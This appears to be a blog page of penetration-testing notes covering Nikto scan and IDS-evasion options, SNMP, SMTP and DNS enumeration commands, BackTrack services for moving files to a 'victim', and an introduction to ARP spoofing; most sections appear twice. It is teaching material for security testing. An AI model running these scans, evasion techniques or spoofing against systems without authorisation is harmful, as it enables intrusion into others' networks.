perl nikto.pl -h 192.168.5.103 -evasion 1
-findonly
Only discover the HTTP(S) ports. do not perform a security scan. This will attempt to connect with HTTP or HTTPS, and report the server header.
-Format
Save the outpout file specified with -o(-output) option in this format. If not specified default is "txt". valid formats are
csv - a comma-seperated list
htm - an HTML report
txt - a text report
xml - an XML report
-host
Host(s) to target. can be an IP address, hsotname or text file of hosts.
-id
ID and password to use for host Basic host authentication. Format is "id:password".
-mutate
Specify mutation technique. A mutation will cause Nikto to combine tests or attempt to guess values. These techniques may cause a tremendous amount of tests to be launched against the target. Use the reference number to specify the type, multiple may be used:
1 - Test all files with all root directories
2 - Guess for password file names
3 - Enumerate user names via Apache (/~user type requests)
4 - Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)
5 - Attempt to brute force sub-domain names, assume that the host name is the parent domain
6 - Attempt to guess directory names from the supplied dictionary file
-mutate-options
Provide extra information for mutates, e.g. a dictionary file
-nolookup
Do not perform name lookups on IP addresses.
-nossl
Do not use SSL to connect to the server.
-no404
Disable 404 (file not found) checking. This will reduce the total number of requests made to the webserver and may be preferable when checking a server over a slow link, or an embedded device. This will generally lead to more false positives being discovered.
-output
Write output to the file specified. Format is defined in -F (-Format), default is text. Existing files will have new information appended.
-port
TCP port(s) to target. To test more than one port on the same host, specify the list of ports in the -p (-port) option. Ports can be specified as a range (i.e., 80-90), or as a comma-delimited list, (i.e., 80,88,90). If not specified, port 80 is used.
-Pause
Seconds to delay between each test.
-root
Prepend the value specified to the beginning of every request. This is useful to test applications or web servers which have all of their files under a certain directory.
-ssl
Only test SSL on the ports specified. Using this option will dramatically speed up requests to HTTPS ports, since otherwise the HTTP request will have to timeout first.
-Single
Perform a single request to a target server. Nikto will prompt for all options which can be specified, and then report the detailed output. See Chapter 5 for detailed information.
-timeout
Seconds to wait before timing out a request. Default timeout is 10 seconds.
-useproxy
Use the HTTP proxy defined in the configuration file.
-update
Update the plugins and databases directly from cirt.net.
-Version
Display the Nikto software, plugin and database versions.
-vhost
Specify the Host header to be sent to the target
-Tuning
Tuning options will control the test that Nikto will use against a target. By default, if any options are specified, only those tests will be performed. If the "x" option is used, it will reverse the logic and exclude only those tests. Use the reference number or letter to specify the type, multiple may be used:
0 - File Upload
1 - Interesting File / Seen in logs
2 - Misconfiguration / Default File
3 - Information Disclosure
4 - Injection (XSS/Script/HTML)
5 - Remote File Retrieval - Inside Web Root
6 - Denial of Service
7 - Remote File Retrieval - Server Wide
8 - Command Execution / Remote Shell
9 - SQL Injection
a - Authentication Bypass
b - Software Identification
c - Remote Source Inclusion
x - Reverse Tuning Options (i.e., include all except specified)
The given string will be parsed from left to right, any x characters will apply to all characters to the right of the character.
perl nikto.pl -h 192.168.1.1 -T 58
If an 'x' is passed to -T then this will negate all tests of types following the x. This is useful where a test may check several different types of exploits. For example
perl nikto.pl -h 192.168.1.1 -T 58xb
.
== Mutation Technique ==
A mutation will cause Nikto to combine tests or attempt to guess values. These techniques may cause a tremendous amount of tests to be launched against the target. Use the reference number to specify the type, multiple may be combined.
1. Test all files with all root directories. This takes each test and splits it into a list of files and directories. A scan list is then created by combining each file with each directory.
2. Guess for password file names. Takes a list of common password file names (such as "passwd", "pass", "password") and file extensions ("txt", "pwd", "bak", etc.) and builds a list of files to check for.
3. Enumerate user names via Apache (/~user type requests). Exploit a misconfiguration with Apache UserDir setups which allows valid user names to be discovered. This will attempt to brute-force guess user names. A file of known users can also be supplied by supplying the file name in the -mutate-options parameter.
4. Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests). Exploit a flaw in cgiwrap which allows valid user names to be discovered. This will attempt to brute-force guess user names. A file of known users can also be supplied by supplying the file name in the -mutate-options parameter.
5. Attempt to brute force sub-domain names. This will attempt to brute force know domain names, it will assume the given host (without a www) is the parent domain.
6. Attempt to brute directory names. This is the only mutate option that requires a file to be passed in the -mutate-options parameter. It will use the given file to attempt to guess directory names. Lists of common directories may be found in the OWASP DirBuster project.
manual
The most basic Nikto scan requires a simply host to target, since port 80 is assumed if none is specified. The host can either be an Ip or a host name of a machine, and is specified using the -h (-host) option. The following will scan the IP 192.168.01 on TCP port 90
perl nikto.pl -h 192.168.0.1
To check on a different port, specifiy the port number with the -p (-port) option
perl nikto.pl -h 192.168.0.1 -p 443
Host, ports, and protocols may also be specified by using a full URL syntax
perl nikto.pl -h https://192.168.0.1:443/
== Multiple Port Testing ==
Nikto can scan multiple ports in the same scanning session. To test more than one port on the same host, specify the list of ports in the -p option. Ports can be specified as range (ie: 80-90), or as a comma-delimited list, (i.e, 80,88,90)
perl nikto.pl -h 192.168.0.1 -p 80,88,443
== Multiple Host Testing ==
Nikto support scanning multiple hosts in the same session via a text file of host names or IPs. Instead of giving a host name or IP for the -h (-host) option, a file name can be given. A file of hosts must be formatted as one host per line, with the port number(s) at the end of each line. Portss can be seperated from the host and other ports via colon or a comma. If no ports specified, port 80 will be assumed.
Example of a valid hosts file
192.168.1.1:80
https://192.168.2.2:8080
192.168.2.2
nikto.pl 192.168.1.1 -e 1 -Display V
A host file may also be an nmap output in "greppable" format (i.e from the output from -oG)
A file may be passed to Nikto through stdout/stdin using "-" as the filename. for example
nmap -p80 192.168.1.1/24 -oG | nikto.pl -h -
== Using a Proxy ==
If the machine running Nikto only has access to the target host (or update server) via an HTTP proxy, the test still can be performed. Set the proxy variable, then execute Nikto with -u (-useproxy) command. All connections will be relayed through the HTTP proxy specified in the configuration file
perl nikto.pl -h 192.168.1.1 -p 80 -u
== Updating ==
Nikto can be automatically updated assuming you have internet connectivity from the host nikto is installed on. To update to the latest plugins and database, simply run the Nikto command with the -update command
perl nikto.pl -update
== All Options ==
Below are all the nikto command line options and explanations.
-Cgidirs
Scan these CGI directories. Special words "none" or "all" may be used to scan all CGI directories or none, (respectively). A literal value for a CGI directory such as "/cgi-test" may be specified (must include trailing slash). If this option is not specified, all CGI directories listed in config.txt will be tested
-config
Specify an alternative config file to use instead of the config.txt located in the install directory.
-dbcheck
Check the scan database for syntax errors
-Display
Control the output that Nikto shows. Use the reference number or letter to specify the type, multiple maybe used
1. Show redirects
2. Show cookies recieved
3. Show all 200/OK responses
4. Show URLs which require authentication
D. Debug output
V. Verbose Output
-evasion
Specify the LibWhisker IDS evasion technique to use. Use the reference number to specify the type, multiple may be used
1. Random URI encoding (non-URF8)
2. Directory self-reference (/./)
3. Premature URL ending
4. Prepend long random string
5. Fake parameter
6. TAB as request spacer
7. Change the case of the URL
8. Use Windows directory seperator (\)
perl nikto.pl -h 192.168.5.103 -evasion 1
-findonly
Only discover the HTTP(S) ports. do not perform a security scan. This will attempt to connect with HTTP or HTTPS, and report the server header.
-Format
Save the outpout file specified with -o(-output) option in this format. If not specified default is "txt". valid formats are
csv - a comma-seperated list
htm - an HTML report
txt - a text report
xml - an XML report
-host
Host(s) to target. can be an IP address, hsotname or text file of hosts.
-id
ID and password to use for host Basic host authentication. Format is "id:password".
-mutate
Specify mutation technique. A mutation will cause Nikto to combine tests or attempt to guess values. These techniques may cause a tremendous amount of tests to be launched against the target. Use the reference number to specify the type, multiple may be used:
1 - Test all files with all root directories
2 - Guess for password file names
3 - Enumerate user names via Apache (/~user type requests)
4 - Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)
5 - Attempt to brute force sub-domain names, assume that the host name is the parent domain
6 - Attempt to guess directory names from the supplied dictionary file
-mutate-options
Provide extra information for mutates, e.g. a dictionary file
-nolookup
Do not perform name lookups on IP addresses.
-nossl
Do not use SSL to connect to the server.
-no404
Disable 404 (file not found) checking. This will reduce the total number of requests made to the webserver and may be preferable when checking a server over a slow link, or an embedded device. This will generally lead to more false positives being discovered.
-output
Write output to the file specified. Format is defined in -F (-Format), default is text. Existing files will have new information appended.
-port
TCP port(s) to target. To test more than one port on the same host, specify the list of ports in the -p (-port) option. Ports can be specified as a range (i.e., 80-90), or as a comma-delimited list, (i.e., 80,88,90). If not specified, port 80 is used.
-Pause
Seconds to delay between each test.
-root
Prepend the value specified to the beginning of every request. This is useful to test applications or web servers which have all of their files under a certain directory.
-ssl
Only test SSL on the ports specified. Using this option will dramatically speed up requests to HTTPS ports, since otherwise the HTTP request will have to timeout first.
-Single
Perform a single request to a target server. Nikto will prompt for all options which can be specified, and then report the detailed output. See Chapter 5 for detailed information.
-timeout
Seconds to wait before timing out a request. Default timeout is 10 seconds.
-useproxy
Use the HTTP proxy defined in the configuration file.
-update
Update the plugins and databases directly from cirt.net.
-Version
Display the Nikto software, plugin and database versions.
-vhost
Specify the Host header to be sent to the target
-Tuning
Tuning options will control the test that Nikto will use against a target. By default, if any options are specified, only those tests will be performed. If the "x" option is used, it will reverse the logic and exclude only those tests. Use the reference number or letter to specify the type, multiple may be used:
0 - File Upload
1 - Interesting File / Seen in logs
2 - Misconfiguration / Default File
3 - Information Disclosure
4 - Injection (XSS/Script/HTML)
5 - Remote File Retrieval - Inside Web Root
6 - Denial of Service
7 - Remote File Retrieval - Server Wide
8 - Command Execution / Remote Shell
9 - SQL Injection
a - Authentication Bypass
b - Software Identification
c - Remote Source Inclusion
x - Reverse Tuning Options (i.e., include all except specified)
The given string will be parsed from left to right, any x characters will apply to all characters to the right of the character.
perl nikto.pl -h 192.168.1.1 -T 58
If an 'x' is passed to -T then this will negate all tests of types following the x. This is useful where a test may check several different types of exploits. For example
perl nikto.pl -h 192.168.1.1 -T 58xb
.
== Mutation Technique ==
A mutation will cause Nikto to combine tests or attempt to guess values. These techniques may cause a tremendous amount of tests to be launched against the target. Use the reference number to specify the type, multiple may be combined.
1. Test all files with all root directories. This takes each test and splits it into a list of files and directories. A scan list is then created by combining each file with each directory.
2. Guess for password file names. Takes a list of common password file names (such as "passwd", "pass", "password") and file extensions ("txt", "pwd", "bak", etc.) and builds a list of files to check for.
3. Enumerate user names via Apache (/~user type requests). Exploit a misconfiguration with Apache UserDir setups which allows valid user names to be discovered. This will attempt to brute-force guess user names. A file of known users can also be supplied by supplying the file name in the -mutate-options parameter.
4. Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests). Exploit a flaw in cgiwrap which allows valid user names to be discovered. This will attempt to brute-force guess user names. A file of known users can also be supplied by supplying the file name in the -mutate-options parameter.
5. Attempt to brute force sub-domain names. This will attempt to brute force know domain names, it will assume the given host (without a www) is the parent domain.
6. Attempt to brute directory names. This is the only mutate option that requires a file to be passed in the -mutate-options parameter. It will use the given file to attempt to guess directory names. Lists of common directories may be found in the OWASP DirBuster project.
Backtrack Basic Config
Assign Static IP
ifconfig eth0 192.168.0.4/24
route add default gw 192.168.0.1
echo nameserver 192.168.0. 200 > /etc/resolv.conf
Apache
You can control the apache server using the apachectl stop / start commands
apachectl start
SSHD
The SSH server can be very useful in various situations, such as SSH tunneling SCP file transfer, remote access etc.
Before the SSH server is started for the first time, SSH keys need to be generated.
To start the SSHD server, issue the following command
#sshd-generate
You can verify that the server is up and listening using the netstat command
#netstat -ant | grep 22
Tftpd
A Tftpd server can be useful in situations in which you need to transfer files to or from a victim machine.
To start the tftpd, issue the following command
#atftpd --daemon --port 69 /tmp
Verify if tftpd is running
netstat -anu | grep 69
VNC Server
A VNC Server is useful for remote desktop sharing or for sending remote reverse VNC connections from an attacked machine.
To start the VNC Server simply type vncserver. You will be prompted for a password and VNC server will open on port 5901
netstat -ant | grep 5901
Check what network interfaces you have
#dmesg | grep -i eth
ifconfig eth0 192.168.0.4/24
route add default gw 192.168.0.1
echo nameserver 192.168.0. 200 > /etc/resolv.conf
Apache
You can control the apache server using the apachectl stop / start commands
apachectl start
SSHD
The SSH server can be very useful in various situations, such as SSH tunneling SCP file transfer, remote access etc.
Before the SSH server is started for the first time, SSH keys need to be generated.
To start the SSHD server, issue the following command
#sshd-generate
You can verify that the server is up and listening using the netstat command
#netstat -ant | grep 22
Tftpd
A Tftpd server can be useful in situations in which you need to transfer files to or from a victim machine.
To start the tftpd, issue the following command
#atftpd --daemon --port 69 /tmp
Verify if tftpd is running
netstat -anu | grep 69
VNC Server
A VNC Server is useful for remote desktop sharing or for sending remote reverse VNC connections from an attacked machine.
To start the VNC Server simply type vncserver. You will be prompted for a password and VNC server will open on port 5901
netstat -ant | grep 5901
Check what network interfaces you have
#dmesg | grep -i eth
Wireshark Display Filters
Display Filters
Wireshark uses display filters for general packet filtering while viewing and for its coloring rules.
show only SMTP (25) and ICMP traffic
tcp.port eq 25 or icmp
show only traffic in the LAN 192.168.x.x between workstations and servers, no internet
ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16
TCP buffer full - source is instructing destination to stop sending data
tcp.window_size == 0 && tcp.flags.reset != 1
Sasser worm: what sasser really did
ls_ads.opnum==0x09
Wireshark uses display filters for general packet filtering while viewing and for its coloring rules.
show only SMTP (25) and ICMP traffic
tcp.port eq 25 or icmp
show only traffic in the LAN 192.168.x.x between workstations and servers, no internet
ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16
TCP buffer full - source is instructing destination to stop sending data
tcp.window_size == 0 && tcp.flags.reset != 1
Sasser worm: what sasser really did
ls_ads.opnum==0x09
Information Gathering Techniques
Information gathering is one of the most important stages of the attack. This is where we gather basic information about our target in order to be able to launch our attack later on.
Google hacking
Searching within a domain
The site: operator restricts the results to website in a given domain.
site: microsoft.com
Lets try the file operator
filetype:pdf site:microsoft.com
Whois reconnaissance
Who is a name for a TCP service, a tool and a database. Whois databases contain nameservers, registrar, and in some cases full contact information about the domain name.
whois checkpoint.com
Whois can also peform reverse lookups, rather than inputting a domain name we can input an IP address. The who is result usually include the whole network range which belongs to the organization/
Google hacking
Searching within a domain
The site: operator restricts the results to website in a given domain.
site: microsoft.com
Lets try the file operator
filetype:pdf site:microsoft.com
Whois reconnaissance
Who is a name for a TCP service, a tool and a database. Whois databases contain nameservers, registrar, and in some cases full contact information about the domain name.
whois checkpoint.com
Whois can also peform reverse lookups, rather than inputting a domain name we can input an IP address. The who is result usually include the whole network range which belongs to the organization/
Open Service Information Gathering
Implementation of various service enumeration methods such as SNMP, SMTP, DNS etc.
#nslookup
> www.checkpoint.com
Identify mail servers belonging to an organization
> set type=mx
> checkpoint.com
identify all the dns servers authoritative for a domain
> set type=ns
> checkpoint.com
Using backtrack tool
#cd /pentest/enumeration/dnsenum/
./dnsenum.pl
SNMP reconnaissance
SNMP is a management protocol and is often used to monitor and remotely configure servers and network devices.
SNMP is based on UDP, a stateless protocol, and is therefore suspectible to IP spoofing. In addition SNMP has a weak authentication system - private (rw) and public (r) community strings. These community strings are passed unencrypted on the network and are often left in their default state "private" and "public"
Let's examine some information from a Windows host running snmp by using the
following command
snmpwalk -c public -v11
Let me demonstrate some interesting commands:
snmpwalk -c public -v1 192.168.0.110 SNMPv2-MIB::sysDescr.0
Enumerating windows users.
snmpwalk -c public -v1 192.168.0.110 1.3 |grep 77.1.2.25 |cut -d" " -f4
Enumerating running services
snmpwalk -c public -v1 192.168.0.110 1 |grep hrSWRunName|cut -d" " -f4
Enumerating open tcp ports
snmpwalk -c public -v1 192.168.0.110 1 |grep tcpConnState |cut -d"." -f6 |sort -nu
Enumerating installed softwares
snmpwalk -c public -v1 192.168.0.110 1 |grep hrSWInstalledName
There are lots of other interesting searches we can do. As usual, there are more
specialized tools for this task – I personally like snmpenum.pl and snmpcheck.pl.
You can find them in the /pentest/enumeration/snmpenum
./snmpcheck-1.3.pl -t 192.168.0.110
SMTP reconnaissance
Under certain misconfigurations, mail servers can also be used to gather information about a host / network. SMTP supports several interesting commands such as VRFY and EXPN.
A VRFY request asks the server to verify an email address while EXPN asks the server for the membership of a mailing list. These can often be abused in order to verify existing users on a mail server, which can aid the attacker later.
Let's look at an example:
nc -v 192.168.0.10 25
#nslookup
> www.checkpoint.com
Identify mail servers belonging to an organization
> set type=mx
> checkpoint.com
identify all the dns servers authoritative for a domain
> set type=ns
> checkpoint.com
Using backtrack tool
#cd /pentest/enumeration/dnsenum/
./dnsenum.pl
SNMP reconnaissance
SNMP is a management protocol and is often used to monitor and remotely configure servers and network devices.
SNMP is based on UDP, a stateless protocol, and is therefore suspectible to IP spoofing. In addition SNMP has a weak authentication system - private (rw) and public (r) community strings. These community strings are passed unencrypted on the network and are often left in their default state "private" and "public"
Let's examine some information from a Windows host running snmp by using the
following command
snmpwalk -c public -v1
Let me demonstrate some interesting commands:
snmpwalk -c public -v1 192.168.0.110 SNMPv2-MIB::sysDescr.0
Enumerating windows users.
snmpwalk -c public -v1 192.168.0.110 1.3 |grep 77.1.2.25 |cut -d" " -f4
Enumerating running services
snmpwalk -c public -v1 192.168.0.110 1 |grep hrSWRunName|cut -d" " -f4
Enumerating open tcp ports
snmpwalk -c public -v1 192.168.0.110 1 |grep tcpConnState |cut -d"." -f6 |sort -nu
Enumerating installed softwares
snmpwalk -c public -v1 192.168.0.110 1 |grep hrSWInstalledName
There are lots of other interesting searches we can do. As usual, there are more
specialized tools for this task – I personally like snmpenum.pl and snmpcheck.pl.
You can find them in the /pentest/enumeration/snmpenum
./snmpcheck-1.3.pl -t 192.168.0.110
SMTP reconnaissance
Under certain misconfigurations, mail servers can also be used to gather information about a host / network. SMTP supports several interesting commands such as VRFY and EXPN.
A VRFY request asks the server to verify an email address while EXPN asks the server for the membership of a mailing list. These can often be abused in order to verify existing users on a mail server, which can aid the attacker later.
Let's look at an example:
nc -v 192.168.0.10 25
ARP Spoofing
ARP spoofing is a horrendous attack vector. It is very easy to implement and can have disastrous effects on a local network.
The theory behind ARP spoofing is that since ARP replies are not verified or
checked in any way, an attacker can send a spoofed ARP reply to a victim
machine, thereby poisoning its ARP cache. Once we control the ARP cache, we
can redirect traffic from that machine at will, in a switched environment.
Ettercap
As usual, customized tools have been created for initiating ARP spoofing attacks.
A nice tool to check out for Windows Platforms is Cain and Able, found on
http://www.oxid.it/. This is a powerful tool capable of sniffing, ARP spoofing,
DNS spoofing, password cracking and more.
My favorite ARP spoofing tool is Ettercap. As described by it authors, Ettercap is
a suite for man in the middle attacks (MITM) on the local LAN. It features
sniffing of live connections, content filtering on the fly and many other
interesting tricks. It supports active and passive dissection of many protocols
(even ciphered ones) and includes many features for network and host analysis.
Let's get Ettercap up and running.
The theory behind ARP spoofing is that since ARP replies are not verified or
checked in any way, an attacker can send a spoofed ARP reply to a victim
machine, thereby poisoning its ARP cache. Once we control the ARP cache, we
can redirect traffic from that machine at will, in a switched environment.
Ettercap
As usual, customized tools have been created for initiating ARP spoofing attacks.
A nice tool to check out for Windows Platforms is Cain and Able, found on
http://www.oxid.it/. This is a powerful tool capable of sniffing, ARP spoofing,
DNS spoofing, password cracking and more.
My favorite ARP spoofing tool is Ettercap. As described by it authors, Ettercap is
a suite for man in the middle attacks (MITM) on the local LAN. It features
sniffing of live connections, content filtering on the fly and many other
interesting tricks. It supports active and passive dissection of many protocols
(even ciphered ones) and includes many features for network and host analysis.
Let's get Ettercap up and running.
Subscribe to:
Posts (Atom)